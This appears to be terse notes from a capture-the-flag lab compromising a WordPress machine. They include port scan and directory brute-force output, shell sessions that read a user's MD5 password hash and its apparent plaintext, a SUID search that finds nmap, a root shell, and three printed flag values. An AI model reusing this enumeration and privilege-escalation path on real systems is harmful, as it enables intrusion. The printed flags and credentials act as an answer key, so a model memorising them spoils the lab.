Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE  SERVICE VERSION
22/tcp  closed ssh
80/tcp  closed http
443/tcp closed https



[04:31:52] 200 -   64B  - /readme
[04:31:52] 200 -   64B  - /readme.html
[04:31:55] 200 -   41B  - /robots.txt
[04:31:55] 301 -    0B  - /roundcube/index.php  ->  http://10.10.77.158/roundcube/
[04:31:55] 301 -    0B  - /rss  ->  http://10.10.77.158/feed/
[04:32:03] 301 -    0B  - /siteadmin/index.php  ->  http://10.10.77.158/siteadmin/
[04:32:03] 200 -    0B  - /sitemap
[04:32:03] 200 -    0B  - /sitemap.xml
[04:32:04] 200 -    0B  - /sitemap.xml.gz
[04:32:06] 301 -    0B  - /sql/index.php  ->  http://10.10.77.158/sql/
[04:32:10] 301 -    0B  - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates  ->  http://10.10.77.158/sugarcrm/?module=Accounts&action=ShowDuplicates
[04:32:10] 301 -    0B  - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates  ->  http://10.10.77.158/sugarcrm/?module=Contacts&action=ShowDuplicates
[04:32:13] 301 -    0B  - /templates/beez/index.php  ->  http://10.10.77.158/templates/beez/
[04:32:13] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://10.10.77.158/templates/ja-helio-farsi/
[04:32:13] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://10.10.77.158/templates/rhuk_milkyway/
[04:32:16] 301 -    0B  - /tmp/index.php  ->  http://10.10.77.158/tmp/
[04:32:17] 301 -    0B  - /tools/phpMyAdmin/index.php  ->  http://10.10.77.158/tools/phpMyAdmin/
[04:32:18] 301 -    0B  - /typo3/phpmyadmin/index.php  ->  http://10.10.77.158/typo3/phpmyadmin/
[04:32:23] 301 -  234B  - /video  ->  http://10.10.77.158/video/
[04:32:27] 301 -    0B  - /web/phpMyAdmin/index.php  ->  http://10.10.77.158/web/phpMyAdmin/
[04:32:27] 301 -    0B  - /webadmin/index.php  ->  http://10.10.77.158/webadmin/
[04:32:29] 301 -  237B  - /wp-admin  ->  http://10.10.77.158/wp-admin/
[04:32:29] 302 -    0B  - /wp-admin/  ->  http://10.10.77.158/wp-login.php?redirect_to=http%3A%2F%2F10.10.77.158%2Fwp-admin%2F&reauth=1
[04:32:29] 200 -   21B  - /wp-admin/admin-ajax.php
[04:32:29] 500 -    3KB - /wp-admin/setup-config.php
[04:32:29] 200 -    0B  - /wp-config.php
[04:32:30] 200 -    0B  - /wp-content/
[04:32:30] 403 -  245B  - /wp-content/plugins/akismet/admin.php
[04:32:30] 403 -  247B  - /wp-content/plugins/akismet/akismet.php
[04:32:30] 301 -    0B  - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://10.10.77.158/wp-content/plugins/adminer/inc/editor/
[04:32:30] 301 -  279B  - /wp-content/plugins/all-in-one-wp-migration/storage  ->  http://10.10.77.158/wp-content/plugins/all-in-one-wp-migration/storage/
[04:32:30] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[04:32:30] 500 -    0B  - /wp-content/plugins/hello.php
[04:32:30] 403 -  228B  - /wp-content/upgrade/
[04:32:30] 301 -  239B  - /wp-content  ->  http://10.10.77.158/wp-content/
[04:32:30] 403 -  228B  - /wp-content/uploads/
[04:32:31] 200 -    0B  - /wp-cron.php
[04:32:31] 301 -  240B  - /wp-includes  ->  http://10.10.77.158/wp-includes/
[04:32:31] 500 -    0B  - /wp-includes/rss-functions.php
[04:32:31] 403 -  221B  - /wp-includes/
[04:32:31] 200 -    1KB - /wp-login/
[04:32:31] 200 -    1KB - /wp-login.php
[04:32:31] 200 -    1KB - /wp-login

c3fcd3d76192e4007dfb496cca67e13b

daemon@ip-10-10-77-158:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b 
md5 abcdefghijklmnopqrstuvwxyz

$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

$ find / -perm -u=s 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/local/bin/nmap


root@ip-10-10-77-158:/root# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
